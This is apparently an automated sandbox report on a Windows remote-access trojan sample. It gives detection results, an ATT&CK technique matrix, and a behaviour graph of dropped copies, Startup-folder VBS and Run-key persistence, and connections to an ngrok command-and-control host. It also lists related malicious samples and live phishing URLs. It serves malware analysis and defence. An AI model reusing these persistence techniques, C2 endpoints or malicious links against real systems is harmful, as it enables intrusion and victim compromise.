        Source: Yara matchFile source: 4.2.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.25c0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.2590000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 7976, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: iR2UtZj5vP.exe PID: 8100, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7180, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 7396, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 340, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2928, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2292, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2960, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2536, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 4520, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information21
        Scripting
        Valid Accounts1
        Windows Management Instrumentation
        21
        Scripting
        1
        DLL Side-Loading
        31
        Disable or Modify Tools
        1
        Input Capture
        1
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts21
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory12
        System Information Discovery
        Remote Desktop Protocol1
        Input Capture
        1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt221
        Registry Run Keys / Startup Folder
        211
        Process Injection
        21
        Obfuscated Files or Information
        Security Account Manager311
        Security Software Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook221
        Registry Run Keys / Startup Folder
        11
        Software Packing
        NTDS231
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput Capture11
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets2
        Process Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion
        Cached Domain Credentials11
        Application Window Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
        Virtualization/Sandbox Evasion
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
        Process Injection
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
        Rundll32
        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1386934 Sample: iR2UtZj5vP.exe Startdate: 05/02/2024 Architecture: WINDOWS Score: 100 76 0.tcp.in.ngrok.io 2->76 84 Snort IDS alert for network traffic 2->84 86 Found malware configuration 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 15 other signatures 2->90 11 iR2UtZj5vP.exe 1 2->11         started        15 WindowsServices.exe 1 2->15         started        17 WindowsServices.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 file5 72 C:\Users\user\...\iR2UtZj5vP.exex (copy), PE32 11->72 dropped 74 C:\Users\user\Desktop\iR2UtZj5vP.exe, PE32 11->74 dropped 110 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 11->110 112 Tries to detect sandboxes / dynamic malware analysis system (file name check) 11->112 114 Contain functionality to detect virtual machines 11->114 118 2 other signatures 11->118 21 iR2UtZj5vP.exe 1 5 11->21         started        24 cmd.exe 2 11->24         started        116 Injects a PE file into a foreign processes 15->116 27 cmd.exe 15->27         started        29 WindowsServices.exe 3 15->29         started        31 cmd.exe 17->31         started        33 WindowsServices.exe 17->33         started        35 cmd.exe 19->35         started        37 WindowsServices.exe 19->37         started        signatures6 process7 file8 66 C:\Users\user\AppData\...\WindowsServices.exe, PE32 21->66 dropped 39 WindowsServices.exe 1 21->39         started        68 C:\Users\user\AppData\Roaming\...\x.vbs, ASCII 24->68 dropped 98 Command shell drops VBS files 24->98 100 Drops VBS files to the startup folder 24->100 43 conhost.exe 24->43         started        45 conhost.exe 27->45         started        47 conhost.exe 31->47         started        49 conhost.exe 35->49         started        signatures9 process10 file11 70 C:\Users\user\...\WindowsServices.exex (copy), PE32 39->70 dropped 102 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 39->102 104 Tries to detect sandboxes / dynamic malware analysis system (file name check) 39->104 106 Contain functionality to detect virtual machines 39->106 108 4 other signatures 39->108 51 WindowsServices.exe 4 5 39->51         started        56 cmd.exe 1 39->56         started        signatures12 process13 dnsIp14 78 3.6.115.182, 19208, 49728 AMAZON-02US United States 51->78 80 0.tcp.in.ngrok.io 3.6.122.107, 19208, 49705, 49706 AMAZON-02US United States 51->80 82 3.6.98.232, 19208, 49720, 49721 AMAZON-02US United States 51->82 64 C:\...\bf497657d005804b657fde8dd2d0cb46.exe, PE32 51->64 dropped 92 Protects its processes via BreakOnTermination flag 51->92 94 Disables zone checking for all users 51->94 96 Creates autostart registry keys with suspicious names 51->96 58 netsh.exe 2 51->58         started        60 conhost.exe 56->60         started        file15 signatures16 process17 process18 62 conhost.exe 58->62         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        iR2UtZj5vP.exe87%ReversingLabsWin32.Trojan.Skeeeyah
        iR2UtZj5vP.exe100%AviraBDS/Poison.mon
        iR2UtZj5vP.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe100%AviraBDS/Poison.mon
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\WindowsServices.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)0%ReversingLabs
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe87%ReversingLabsWin32.Trojan.Skeeeyah
        C:\Users\user\Desktop\iR2UtZj5vP.exe0%ReversingLabs
        C:\Users\user\Desktop\iR2UtZj5vP.exex (copy)0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        0.tcp.in.ngrok.io100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        0.tcp.in.ngrok.io
        3.6.122.107
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          0.tcp.in.ngrok.iotrue
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          3.6.122.107
          0.tcp.in.ngrok.ioUnited States
          16509AMAZON-02UStrue
          3.6.115.182
          unknownUnited States
          16509AMAZON-02UStrue
          3.6.98.232
          unknownUnited States
          16509AMAZON-02UStrue
          Joe Sandbox version:39.0.0 Ruby
          Analysis ID:1386934
          Start date and time:2024-02-05 17:10:16 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 42s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:31
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:iR2UtZj5vP.exe
          renamed because original name is a hash value
          Original Sample Name:52b074e39e4f3ba00c230ba82eb62499.exe
          Detection:MAL
          Classification:mal100.phis.troj.adwa.spyw.expl.evad.winEXE@35/9@4/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 98%
          • Number of executed functions: 126
          • Number of non-executed functions: 57
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: iR2UtZj5vP.exe
          TimeTypeDescription
          17:11:22AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
          17:11:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
          17:11:44API Interceptor111980x Sleep call for process: WindowsServices.exe modified
          17:11:49AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
          17:11:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
          17:12:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3.6.122.107RN2vknsx6G.exeGet hashmaliciousRedLineBrowse
          • 0.tcp.in.ngrok.io:17440/
          3.6.115.182RN2vknsx6G.exeGet hashmaliciousRedLineBrowse
          • 0.tcp.in.ngrok.io:17440/
          3.6.98.232ZB7Ot9MOic.exeGet hashmaliciousNjratBrowse
            etJZk4UQhS.exeGet hashmaliciousNjratBrowse
              jango.exeGet hashmaliciousXWormBrowse
                cracksetup.exeGet hashmaliciousNanocoreBrowse
                  LocalStaFvjUblU.exeGet hashmaliciousnjRatBrowse
                    JsYdl3ZkOA.exeGet hashmaliciousnjRatBrowse
                      ehqsU9jDFb.exeGet hashmaliciousnjRatBrowse
                        EADSXus8Cw.exeGet hashmaliciousnjRatBrowse
                          KPiASQ9E43.exeGet hashmaliciousNjratBrowse
                            DDD24717592B5B34947AF56B9F84CD2CE01B0B2EFB62D.exeGet hashmaliciousnjRatBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              0.tcp.in.ngrok.ioZB7Ot9MOic.exeGet hashmaliciousNjratBrowse
                              • 3.6.30.85
                              etJZk4UQhS.exeGet hashmaliciousNjratBrowse
                              • 3.6.122.107
                              jango.exeGet hashmaliciousXWormBrowse
                              • 3.6.30.85
                              cracksetup.exeGet hashmaliciousNanocoreBrowse
                              • 3.6.98.232
                              LocalStaFvjUblU.exeGet hashmaliciousnjRatBrowse
                              • 3.6.122.107
                              558EofiXYO.exeGet hashmaliciousnjRatBrowse
                              • 3.6.115.64
                              JsYdl3ZkOA.exeGet hashmaliciousnjRatBrowse
                              • 3.6.115.64
                              ehqsU9jDFb.exeGet hashmaliciousnjRatBrowse
                              • 3.6.115.182
                              EADSXus8Cw.exeGet hashmaliciousnjRatBrowse
                              • 3.6.30.85
                              KPiASQ9E43.exeGet hashmaliciousNjratBrowse
                              • 3.6.30.85
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AMAZON-02USfile.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                              • 54.241.95.51
                              a0650c66-3e59-b3ed-9a0d-9061398de55a.emlGet hashmaliciousFake CaptchaBrowse
                              • 52.85.132.85
                              file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                              • 3.163.115.74
                              Inv & remit.xlsxGet hashmaliciousHTMLPhisherBrowse
                              • 76.76.21.241
                              Inv & remit.xlsxGet hashmaliciousUnknownBrowse
                              • 108.156.152.63
                              http://shjj.ysxo.phestoslevi.online/wr/#?service=bmFzc2ltLmdyaWJpQGNyb3dlLmNvLnVrJnJvYXIyJmM=Get hashmaliciousUnknownBrowse
                              • 99.84.108.83
                              http://mediasiteconnect.com/site/dyslexia-southwest-2024/integratedLoginGet hashmaliciousUnknownBrowse
                              • 13.249.120.62
                              https://script.google.com/macros/s/AKfycbyqeaWecVxl9bztwLn8C2J1NaiZk1cJk016HEld2UPz2Xqc6eSp0SzjZOQdPS1Ap8NQpQ/execGet hashmaliciousUnknownBrowse
                              • 52.46.155.15
                              dcsmio-OneDigital Health and Benefits-W2.docxGet hashmaliciousUnknownBrowse
                              • 52.217.73.30
                              dcsmio-OneDigital Health and Benefits-W2.docxGet hashmaliciousUnknownBrowse
                              • 52.216.41.80
                              AMAZON-02USfile.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                              • 54.241.95.51
                              a0650c66-3e59-b3ed-9a0d-9061398de55a.emlGet hashmaliciousFake CaptchaBrowse
                              • 52.85.132.85
                              file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                              • 3.163.115.74
                              Inv & remit.xlsxGet hashmaliciousHTMLPhisherBrowse
                              • 76.76.21.241
                              Inv & remit.xlsxGet hashmaliciousUnknownBrowse
                              • 108.156.152.63
                              http://shjj.ysxo.phestoslevi.online/wr/#?service=bmFzc2ltLmdyaWJpQGNyb3dlLmNvLnVrJnJvYXIyJmM=Get hashmaliciousUnknownBrowse
                              • 99.84.108.83
                              http://mediasiteconnect.com/site/dyslexia-southwest-2024/integratedLoginGet hashmaliciousUnknownBrowse
                              • 13.249.120.62
                              https://script.google.com/macros/s/AKfycbyqeaWecVxl9bztwLn8C2J1NaiZk1cJk016HEld2UPz2Xqc6eSp0SzjZOQdPS1Ap8NQpQ/execGet hashmaliciousUnknownBrowse
                              • 52.46.155.15
                              dcsmio-OneDigital Health and Benefits-W2.docxGet hashmaliciousUnknownBrowse
                              • 52.217.73.30
                              dcsmio-OneDigital Health and Benefits-W2.docxGet hashmaliciousUnknownBrowse
                              • 52.216.41.80
                              AMAZON-02USfile.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                              • 54.241.95.51
                              a0650c66-3e59-b3ed-9a0d-9061398de55a.emlGet hashmaliciousFake CaptchaBrowse
                              • 52.85.132.85
                              file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                              • 3.163.115.74
                              Inv & remit.xlsxGet hashmaliciousHTMLPhisherBrowse
                              • 76.76.21.241
                              Inv & remit.xlsxGet hashmaliciousUnknownBrowse
                              • 108.156.152.63
                              http://shjj.ysxo.phestoslevi.online/wr/#?service=bmFzc2ltLmdyaWJpQGNyb3dlLmNvLnVrJnJvYXIyJmM=Get hashmaliciousUnknownBrowse
                              • 99.84.108.83
                              http://mediasiteconnect.com/site/dyslexia-southwest-2024/integratedLoginGet hashmaliciousUnknownBrowse
                              • 13.249.120.62
                              https://script.google.com/macros/s/AKfycbyqeaWecVxl9bztwLn8C2J1NaiZk1cJk016HEld2UPz2Xqc6eSp0SzjZOQdPS1Ap8NQpQ/execGet hashmaliciousUnknownBrowse
                              • 52.46.155.15
                              dcsmio-OneDigital Health and Benefits-W2.docxGet hashmaliciousUnknownBrowse
                              • 52.217.73.30
                              dcsmio-OneDigital Health and Benefits-W2.docxGet hashmaliciousUnknownBrowse
                              • 52.216.41.80
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\WindowsServices.exel0HzgCOAMF.exeGet hashmaliciousNjratBrowse
                                clSwWjTkJf.exeGet hashmaliciousNjratBrowse
                                  _____(NYCU_2307-19TW)#Ufffdpdf.exeGet hashmaliciousNanocore, GuLoader, MailPassView, RemcosBrowse
                                    1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                      DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exeGet hashmaliciousNanocore, GuLoaderBrowse
                                        0473350311911207E#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoader, MailPassView, RemcosBrowse
                                          PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                            2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                              DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                DLAWT.scr.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                  C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)l0HzgCOAMF.exeGet hashmaliciousNjratBrowse
                                                    clSwWjTkJf.exeGet hashmaliciousNjratBrowse
                                                      _____(NYCU_2307-19TW)#Ufffdpdf.exeGet hashmaliciousNanocore, GuLoader, MailPassView, RemcosBrowse
                                                        1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                          DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exeGet hashmaliciousNanocore, GuLoaderBrowse
                                                            0473350311911207E#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoader, MailPassView, RemcosBrowse
                                                              PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                  DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                    DLAWT.scr.exeGet hashmaliciousNanoCore, GuLoaderBrowse
                                                                      Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):525
                                                                      Entropy (8bit):5.259753436570609
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                                                      MD5:260E01CC001F9C4643CA7A62F395D747
                                                                      SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                                                      SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                                                      SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):525
                                                                      Entropy (8bit):5.259753436570609
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
                                                                      MD5:260E01CC001F9C4643CA7A62F395D747
                                                                      SHA1:492AD0ACE3A9C8736909866EEA168962D418BE5A
                                                                      SHA-256:4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
                                                                      SHA-512:01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: l0HzgCOAMF.exe, Detection: malicious, Browse
                                                                      • Filename: clSwWjTkJf.exe, Detection: malicious, Browse
                                                                      • Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious, Browse
